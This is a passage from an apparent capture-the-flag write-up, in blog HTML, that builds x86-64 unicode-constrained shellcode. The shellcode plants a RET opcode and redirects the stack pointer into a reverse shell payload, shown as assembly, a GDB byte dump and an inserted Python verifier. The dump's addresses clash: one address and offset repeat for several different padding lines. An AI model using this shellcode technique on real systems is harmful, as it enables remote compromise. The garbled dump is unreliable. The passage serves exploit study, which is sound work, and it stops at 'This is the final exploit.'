<span style="font-family: 'Courier New';"> 0x7ffff7ff60f9:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">jl 0x7ffff7ff60fb</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x7ffff7ff60fb:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">jge 0x7ffff7ff60fd</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x7ffff7ff60fd:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">jle 0x7ffff7ff60ff</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x7ffff7ff60ff:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">jg 0x7ffff7ff6101</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"><br /></span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-size: 9pt; line-height: 1.5;"><br /></span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
To sum up, we can use register PUSH/POP instructions, and we can adjust a register's value by pushing it and overwriting a byte on the stack.</div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<br /></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
With a clever combination of these instructions we can write a RET instruction at the end of the unicode shellcode,</div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
and we were able to make RSP point at the normal reverse shellcode. See below.</div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<br /></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<b><span style="font-family: 'Courier New';">0x7ffff7ff606b:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">xor $0x37003600,%eax</span></b></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<b><span style="font-family: 'Courier New';">0x7ffff7ff6070:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">add %bh,(%rax)</span></b></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<br /></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
We can't XOR an arbitrary constant into a register, but we can XOR a constant whose second and fourth bytes are zero. We can also add the AH, BH, CH, DH... (second-byte) registers to a memory location pointed to by RAX.</div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<br /></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
We exploit the fact that</div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
1. we can put a RET instruction at the end of the unicode shellcode, and</div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
2. we can adjust RSP to point at the start of the reverse shellcode.</div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<br /></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
It's complex, but the following describes the scenario.</div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<br /></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="color: #4c4c4c;"># set return opcode into bh</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="color: #4c4c4c;">xor</span><span class="Apple-tab-span" style="color: #4c4c4c; white-space: pre;"> </span><span style="color: #4c4c4c;">$0x20002000, %eax # EAX: 20002000</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="color: #4c4c4c; font-size: 9pt; line-height: 1.5;">sub</span><span class="Apple-tab-span" style="color: #4c4c4c; font-size: 9pt; line-height: 1.5; white-space: pre;"> </span><span style="font-size: 9pt; line-height: 1.5;"><span style="color: #4c4c4c;">$0x30003000, %eax</span><span style="color: #4c4c4c;"> </span><span style="color: #4c4c4c;"> </span><span style="color: #4c4c4c;"># EAX: EFFFF000</span></span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="color: #4c4c4c; font-size: 9pt; line-height: 1.5;">xor</span><span class="Apple-tab-span" style="color: #4c4c4c; font-size: 9pt; line-height: 1.5; white-space: pre;"> </span><span style="font-size: 9pt; line-height: 1.5;"><span style="color: #4c4c4c;">$0x33003300, %eax</span><span style="color: #4c4c4c;"> </span><span style="color: #4c4c4c;"> </span><span style="color: #4c4c4c;"># EAX: DCFFC300</span></span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="color: #4c4c4c; font-size: 9pt; line-height: 1.5;">push</span><span class="Apple-tab-span" style="color: #4c4c4c; font-size: 9pt; line-height: 1.5; white-space: pre;"> </span><span style="color: #4c4c4c; font-size: 9pt; line-height: 1.5;">%rax</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="color: #4c4c4c; font-size: 9pt; line-height: 1.5;">pop</span><span class="Apple-tab-span" style="color: #4c4c4c; font-size: 9pt; line-height: 1.5; white-space: pre;"> </span><span style="font-size: 9pt; line-height: 1.5;"><span style="color: #4c4c4c;">%rbx</span><span style="color: #4c4c4c;"> </span><span style="color: #4c4c4c;"> </span><span style="color: #4c4c4c;"> </span><span style="color: #4c4c4c;"> </span><span style="color: #4c4c4c;"> </span><span style="color: #4c4c4c;"> </span><span style="color: #4c4c4c;"> </span></span><span style="color: #4c4c4c; font-size: 9pt; line-height: 1.5;"># EBX: DCFFC300. BH has value C3(ret)</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<br /></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="color: #4c4c4c;"># set RDX to shellcode + X</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="color: #4c4c4c;">push</span><span class="Apple-tab-span" style="color: #4c4c4c; white-space: pre;"> </span><span style="color: #4c4c4c;">%rdx</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="color: #4c4c4c; font-size: 9pt; line-height: 1.5;">pop</span><span class="Apple-tab-span" style="color: #4c4c4c; font-size: 9pt; line-height: 1.5; white-space: pre;"> </span><span style="color: #4c4c4c; font-size: 9pt; line-height: 1.5;">%rax</span><span class="Apple-tab-span" style="font-size: 9pt; line-height: 1.5; white-space: pre;"><span style="color: #4c4c4c;"> </span><span style="color: #4c4c4c;"> </span><span style="color: #4c4c4c;"> </span><span style="color: #4c4c4c;"> </span><span style="color: #4c4c4c;"> </span><span style="color: #4c4c4c;"> </span><span style="color: #4c4c4c;"> </span><span style="color: #4c4c4c;"> </span></span><span style="color: #4c4c4c; font-size: 9pt; line-height: 1.5;"># get address of shellcode</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="color: #4c4c4c;">push</span><span class="Apple-tab-span" style="color: #4c4c4c; white-space: pre;"> </span><span style="color: #4c4c4c;">%rax # push the address of shellcode</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="color: #4c4c4c; font-size: 9pt; line-height: 1.5;">push</span><span class="Apple-tab-span" style="color: #4c4c4c; font-size: 9pt; line-height: 1.5; white-space: pre;"> </span><span style="color: #4c4c4c; font-size: 9pt; line-height: 1.5;">%rsp # push the address of address of shellcode</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="color: #4c4c4c; font-size: 9pt; line-height: 1.5;">pop</span><span class="Apple-tab-span" style="color: #4c4c4c; font-size: 9pt; line-height: 1.5; white-space: pre;"> </span><span style="color: #4c4c4c; font-size: 9pt; line-height: 1.5;">%rax # set RAX the address of address of shellcode</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="color: #4c4c4c;">add</span><span class="Apple-tab-span" style="color: #4c4c4c; white-space: pre;"> </span><span style="color: #4c4c4c;">%bh, (%rax)</span><span class="Apple-tab-span" style="white-space: pre;"> </span><span style="color: #4c4c4c;"># add 0xC3 to the low byte of the saved shellcode address (no carry, since the mmap buffer is page aligned)</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="color: #4c4c4c; font-size: 9pt; line-height: 1.5;">pop</span><span class="Apple-tab-span" style="color: #4c4c4c; font-size: 9pt; line-height: 1.5; white-space: pre;"> </span><span style="color: #4c4c4c; font-size: 9pt; line-height: 1.5;">%rdx</span><span class="Apple-tab-span" style="font-size: 9pt; line-height: 1.5; white-space: pre;"> </span><span style="color: #4c4c4c; font-size: 9pt; line-height: 1.5;"># set RDX to shellcode + 0xC3</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<br /></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="color: #4c4c4c;"># write the RET opcode (0xC3) at shellcode + 0xC3</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="color: #4c4c4c;">add</span><span class="Apple-tab-span" style="color: #4c4c4c; white-space: pre;"> </span><span style="color: #4c4c4c;">%bh, (%rdx)</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<br /></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="color: #4c4c4c;"># get the malloc buffer address into RAX</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="color: #4c4c4c;">pop</span><span class="Apple-tab-span" style="color: #4c4c4c; white-space: pre;"> </span><span style="color: #4c4c4c;">%rax</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="color: #4c4c4c; font-size: 9pt; line-height: 1.5;">pop</span><span class="Apple-tab-span" style="color: #4c4c4c; font-size: 9pt; line-height: 1.5; white-space: pre;"> </span><span style="color: #4c4c4c; font-size: 9pt; line-height: 1.5;">%rax</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="color: #4c4c4c; font-size: 9pt; line-height: 1.5;">pop</span><span class="Apple-tab-span" style="color: #4c4c4c; font-size: 9pt; line-height: 1.5; white-space: pre;"> </span><span style="color: #4c4c4c; font-size: 9pt; line-height: 1.5;">%rax</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="color: #4c4c4c; font-size: 9pt; line-height: 1.5;">pop</span><span class="Apple-tab-span" style="color: #4c4c4c; font-size: 9pt; line-height: 1.5; white-space: pre;"> </span><span style="color: #4c4c4c; font-size: 9pt; line-height: 1.5;">%rax</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="color: #4c4c4c; font-size: 9pt; line-height: 1.5;">pop</span><span class="Apple-tab-span" style="color: #4c4c4c; font-size: 9pt; line-height: 1.5; white-space: pre;"> </span><span style="font-size: 9pt; line-height: 1.5;"><span style="color: #4c4c4c;">%rax</span><span style="color: #4c4c4c;"> </span><span style="color: #4c4c4c;"> </span><span style="color: #4c4c4c;"> </span><span style="color: #4c4c4c;"> </span><span style="color: #4c4c4c;"> </span><span style="color: #4c4c4c;"> </span><span style="color: #4c4c4c;"> </span><span style="color: #4c4c4c;"># now RAX has malloc buffer address.</span></span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<br /></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="color: #4c4c4c;"># set RSP to RAX (the buffer address)</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="color: #4c4c4c;">push</span><span class="Apple-tab-span" style="color: #4c4c4c; white-space: pre;"> </span><span style="color: #4c4c4c;">%rax</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="color: #4c4c4c; font-size: 9pt; line-height: 1.5;">pop</span><span class="Apple-tab-span" style="color: #4c4c4c; font-size: 9pt; line-height: 1.5; white-space: pre;"> </span><span style="color: #4c4c4c; font-size: 9pt; line-height: 1.5;">%rsp</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<br /></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="color: #4c4c4c;"># increase RSP enough to skip the unicode shellcode part, then push RSP onto the stack.</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="color: #4c4c4c;">pop</span><span class="Apple-tab-span" style="color: #4c4c4c; white-space: pre;"> </span><span style="color: #4c4c4c;">%rcx</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="color: #4c4c4c; font-size: 9pt; line-height: 1.5;">pop</span><span class="Apple-tab-span" style="color: #4c4c4c; font-size: 9pt; line-height: 1.5; white-space: pre;"> </span><span style="color: #4c4c4c; font-size: 9pt; line-height: 1.5;">%rcx</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="color: #4c4c4c; font-size: 9pt; line-height: 1.5;">pop</span><span class="Apple-tab-span" style="color: #4c4c4c; font-size: 9pt; line-height: 1.5; white-space: pre;"> </span><span style="color: #4c4c4c; font-size: 9pt; line-height: 1.5;">%rcx</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="color: #4c4c4c; font-size: 9pt; line-height: 1.5;">pop</span><span class="Apple-tab-span" style="color: #4c4c4c; font-size: 9pt; line-height: 1.5; white-space: pre;"> </span><span style="color: #4c4c4c; font-size: 9pt; line-height: 1.5;">%rcx</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="color: #4c4c4c; font-size: 9pt; line-height: 1.5;">pop</span><span class="Apple-tab-span" style="color: #4c4c4c; font-size: 9pt; line-height: 1.5; white-space: pre;"> </span><span style="color: #4c4c4c; font-size: 9pt; line-height: 1.5;">%rcx</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="color: #4c4c4c; font-size: 9pt; line-height: 1.5;">pop</span><span class="Apple-tab-span" style="color: #4c4c4c; font-size: 9pt; line-height: 1.5; white-space: pre;"> </span><span style="color: #4c4c4c; font-size: 9pt; line-height: 1.5;">%rcx</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="color: #4c4c4c; font-size: 9pt; line-height: 1.5;">pop</span><span class="Apple-tab-span" style="color: #4c4c4c; font-size: 9pt; line-height: 1.5; white-space: pre;"> </span><span style="color: #4c4c4c; font-size: 9pt; line-height: 1.5;">%rcx</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="color: #4c4c4c; font-size: 9pt; line-height: 1.5;">pop</span><span class="Apple-tab-span" style="color: #4c4c4c; font-size: 9pt; line-height: 1.5; white-space: pre;"> </span><span style="color: #4c4c4c; font-size: 9pt; line-height: 1.5;">%rcx</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="color: #4c4c4c; font-size: 9pt; line-height: 1.5;">pop</span><span class="Apple-tab-span" style="color: #4c4c4c; font-size: 9pt; line-height: 1.5; white-space: pre;"> </span><span style="color: #4c4c4c; font-size: 9pt; line-height: 1.5;">%rcx</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="color: #4c4c4c; font-size: 9pt; line-height: 1.5;">pop</span><span class="Apple-tab-span" style="color: #4c4c4c; font-size: 9pt; line-height: 1.5; white-space: pre;"> </span><span style="color: #4c4c4c; font-size: 9pt; line-height: 1.5;">%rcx</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="color: #4c4c4c; font-size: 9pt; line-height: 1.5;">pop</span><span class="Apple-tab-span" style="color: #4c4c4c; font-size: 9pt; line-height: 1.5; white-space: pre;"> </span><span style="color: #4c4c4c; font-size: 9pt; line-height: 1.5;">%rcx</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="color: #4c4c4c; font-size: 9pt; line-height: 1.5;">pop</span><span class="Apple-tab-span" style="color: #4c4c4c; font-size: 9pt; line-height: 1.5; white-space: pre;"> </span><span style="color: #4c4c4c; font-size: 9pt; line-height: 1.5;">%rcx</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="color: #4c4c4c; font-size: 9pt; line-height: 1.5;">pop</span><span class="Apple-tab-span" style="color: #4c4c4c; font-size: 9pt; line-height: 1.5; white-space: pre;"> </span><span style="color: #4c4c4c; font-size: 9pt; line-height: 1.5;">%rcx</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="color: #4c4c4c; font-size: 9pt; line-height: 1.5;">push</span><span class="Apple-tab-span" style="color: #4c4c4c; font-size: 9pt; line-height: 1.5; white-space: pre;"> </span><span style="color: #4c4c4c; font-size: 9pt; line-height: 1.5;">%rsp</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<br /></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="color: #4c4c4c;"># set RAX to a valid address for the unicode shellcode NOP sled.</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="color: #4c4c4c;">push</span><span class="Apple-tab-span" style="color: #4c4c4c; white-space: pre;"> </span><span style="color: #4c4c4c;">%rbp</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="color: #4c4c4c; font-size: 9pt; line-height: 1.5;">pop</span><span class="Apple-tab-span" style="color: #4c4c4c; font-size: 9pt; line-height: 1.5; white-space: pre;"> </span><span style="color: #4c4c4c; font-size: 9pt; line-height: 1.5;">%rax</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<br /></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="color: #4c4c4c; font-size: 9pt; line-height: 1.5;"># everything set. wait for return!!</span></div>
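<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
The following Python is an added example, not code from this writeup or from the Alternatives team. It re-derives the EAX arithmetic of the "set return opcode into bh" step and confirms BH ends up as 0xC3, models the 8-bit <span style="font-family: 'Courier New';">add %bh,(%rax)</span> on a stored address (showing why the page-aligned mmap buffer matters: a non-aligned address would lose the carry), and checks the instruction bytes from the GDB dump further down against the unicode constraint (every odd offset is 0x00). Assumptions made here and not stated on the page: EAX starts at zero, the narrow input is NUL-terminated so a 0x00 at an even offset is also disallowed, and the <span style="font-family: 'Courier New';">00 6d 00</span> padding is appended after every instruction that leaves the stream at an odd offset.</div>

```python
from typing import Iterable, List, Tuple

MASK32 = 0xFFFFFFFF

# One-byte opcodes of the "<op> $imm32,%eax" forms used in the writeup.
OPCODES = {"xor": 0x35, "sub": 0x2D, "add": 0x05}

# Padding the writeup inserts after odd-length instructions: 00 6d 00,
# which decodes as the harmless add %ch,0x0(%rbp) and realigns the stream.
PAD = bytes.fromhex("00 6d 00")


def unicode_safe(code: bytes) -> bool:
    """True if the byte stream could have come out of an ASCII->UTF-16LE
    widening: every odd offset is 0x00 and every even offset is non-zero
    (assumption: a 0x00 in the narrow input would terminate it)."""
    return all((b == 0) if i % 2 else (b != 0) for i, b in enumerate(code))


def encode_eax_imm(op: str, imm: int) -> bytes:
    """Encode `<op> $imm32,%eax` as opcode + little-endian immediate."""
    return bytes([OPCODES[op]]) + (imm & MASK32).to_bytes(4, "little")


def derive_eax(ops: Iterable[Tuple[str, int]]) -> int:
    """Emulate the 32-bit EAX arithmetic, starting from EAX = 0 (assumed),
    rejecting any instruction whose encoding breaks the unicode constraint."""
    eax = 0
    for op, imm in ops:
        insn = encode_eax_imm(op, imm)
        if not unicode_safe(insn):
            raise ValueError(f"{op} ${imm:#010x} is not unicode-safe: {insn.hex()}")
        if op == "xor":
            eax ^= imm & MASK32
        elif op == "sub":
            eax = (eax - imm) & MASK32
        else:  # add
            eax = (eax + imm) & MASK32
    return eax


def high_byte(reg32: int) -> int:
    """The *H sub-register (bits 8..15), e.g. BH of EBX."""
    return (reg32 >> 8) & 0xFF


def add_to_low_byte(stored: int, delta: int) -> int:
    """Model `add %bh,(%rax)` with RAX pointing at a stored 64-bit address:
    the 8-bit add touches only the lowest byte, so any carry is lost.  The
    result equals stored + delta only when the low byte does not overflow,
    which a page-aligned buffer (low byte 0x00) guarantees."""
    return (stored & ~0xFF) | (((stored & 0xFF) + delta) & 0xFF)


def pad_join(instructions: List[bytes]) -> bytes:
    """Concatenate instructions, appending PAD after any that leaves the
    stream at an odd offset, so the next opcode lands on an even offset."""
    out = bytearray()
    for insn in instructions:
        out += insn
        if len(out) % 2:
            out += PAD
    return bytes(out)


# The three ops from the "set return opcode into bh" step above.
RET_OPS = [("xor", 0x20002000), ("sub", 0x30003000), ("xor", 0x33003300)]

# Bytes copied from the GDB dump in the post (first five instructions
# together with their padding).
DUMPED_CODE = bytes.fromhex(
    "35 00 20 00 20 00 6d 00 "  # xor $0x20002000,%eax ; pad
    "2d 00 30 00 30 00 6d 00 "  # sub $0x30003000,%eax ; pad
    "35 00 33 00 33 00 6d 00 "  # xor $0x33003300,%eax ; pad
    "50 00 6d 00 "              # push %rax ; pad
    "5b 00 6d 00 "              # pop %rbx ; pad
)


def check_writeup() -> dict:
    """Re-derive the values the writeup states and return them."""
    eax = derive_eax(RET_OPS)
    rebuilt = pad_join([encode_eax_imm(*o) for o in RET_OPS] + [b"\x50", b"\x5b"])
    return {
        "eax": eax,                              # 0xDCFFC300
        "bh": high_byte(eax),                    # 0xC3, the RET opcode
        "dump_matches": rebuilt == DUMPED_CODE,  # padding rule reproduces the dump
        "dump_safe": unicode_safe(DUMPED_CODE),
    }


if __name__ == "__main__":
    print(check_writeup())
```

Running the block prints the re-derived EAX value, BH, and whether the padded instruction layout and the unicode check agree with the dump on this page; feed <span style="font-family: 'Courier New';">add_to_low_byte</span> a non-page-aligned address to see the offset the comment above warns about go wrong.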
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<br /></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
We extracted the machine code bytes with GDB:</div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<br /></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';">Dump of assembler code for function main:</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x0000000000401110 <+0>:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">35 00 20 00 20</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">xor $0x20002000,%eax</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x0000000000401120 <+16>:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">00 6d 00</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">add %ch,0x0(%rbp)</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x0000000000401115 <+5>:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">2d 00 30 00 30</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">sub $0x30003000,%eax</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x0000000000401120 <+16>:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">00 6d 00</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">add %ch,0x0(%rbp)</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x000000000040111a <+10>:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">35 00 33 00 33</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">xor $0x33003300,%eax</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x0000000000401120 <+16>:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">00 6d 00</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">add %ch,0x0(%rbp)</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x000000000040111f <+15>:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">50</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">push %rax</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x0000000000401120 <+16>:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">00 6d 00</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">add %ch,0x0(%rbp)</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x0000000000401123 <+19>:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">5b</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">pop %rbx</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x0000000000401124 <+20>:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">00 6d 00</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">add %ch,0x0(%rbp)</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x0000000000401127 <+23>:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">52</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">push %rdx</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x0000000000401128 <+24>:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">00 6d 00</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">add %ch,0x0(%rbp)</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x000000000040112b <+27>:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">58</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">pop %rax</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x000000000040112c <+28>:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">00 6d 00</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">add %ch,0x0(%rbp)</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x000000000040112f <+31>:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">50</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">push %rax</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
...</div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<br /></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<br /></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-size: 9pt; line-height: 1.5;">This is the final exploit.</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<br /></div>
<div style="clear: none; color: #333333; float: none; font-family: 돋움; font-size: 12px; line-height: 18px; text-align: center;">
